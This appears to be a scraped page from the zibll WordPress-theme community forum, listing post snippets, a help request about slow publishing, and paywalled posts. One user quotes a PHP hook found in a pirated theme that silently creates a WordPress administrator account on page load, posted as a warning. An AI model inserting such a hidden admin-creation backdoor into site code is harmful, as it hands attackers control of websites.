zibll综合交流社区-zibll综合交流板块-zibll子比主题-zibll子比社区
zibll综合交流-zibll子比社区

zibll综合交流

帖子 3152互动 3W+关注 469
欢迎使用子比主题建站的朋友们在此交流
zibll综合交流-zibll子比社区
评分
5分享
评分
5分享
评分
16分享
【有偿求助】怎么办呀,发布文章的时候转圈圈,要转个15秒左右
评分
13分享
有添加管理员账号的function代码,之前帮一个大聪明排查网站结果是盗版主题看到了这段代码

add_action( 'template_redirect', 'wpdaxue_create_admin_user' );
function wpdaxue_create_admin_user() {
 
	$username = FALSE; // 将FALSE改为你的用户名,包含英文引号,(例如 'username' ),下同
	$password = FALSE; // 将FALSE改为你的密码 (例如 'password' )
	$email_address = FALSE; // 将FALSE改为你的邮箱地址 (例如 '114514@1919810.com' )
 
	if ( isset( $username ) && isset( $password ) && isset( $email_address ) ) {
		if ( ! username_exists( $username ) && ! email_exists( $email_address ) ) {
 
			$user_id = wp_create_user( $username, $password, $email_address );
			if ( is_int( $user_id ) ) {
				$wp_user_object = new WP_User( $user_id );
				$wp_user_object->set_role( 'administrator' );
			}
		}
	}
}
评分
4分享
评分
4分享
该帖子部分内容已隐藏
付费阅读
58.88
此内容为付费阅读,请付费后查看
评分
4分享
评分
5分享
该帖子内容已隐藏

以下用户组可查看

代理会员代理会员等级-LV10-zibll子比社区及更高等级认证用户

登录后查看我的权限

评分
6分享
评分
5分享
评分
2分享
评分
3分享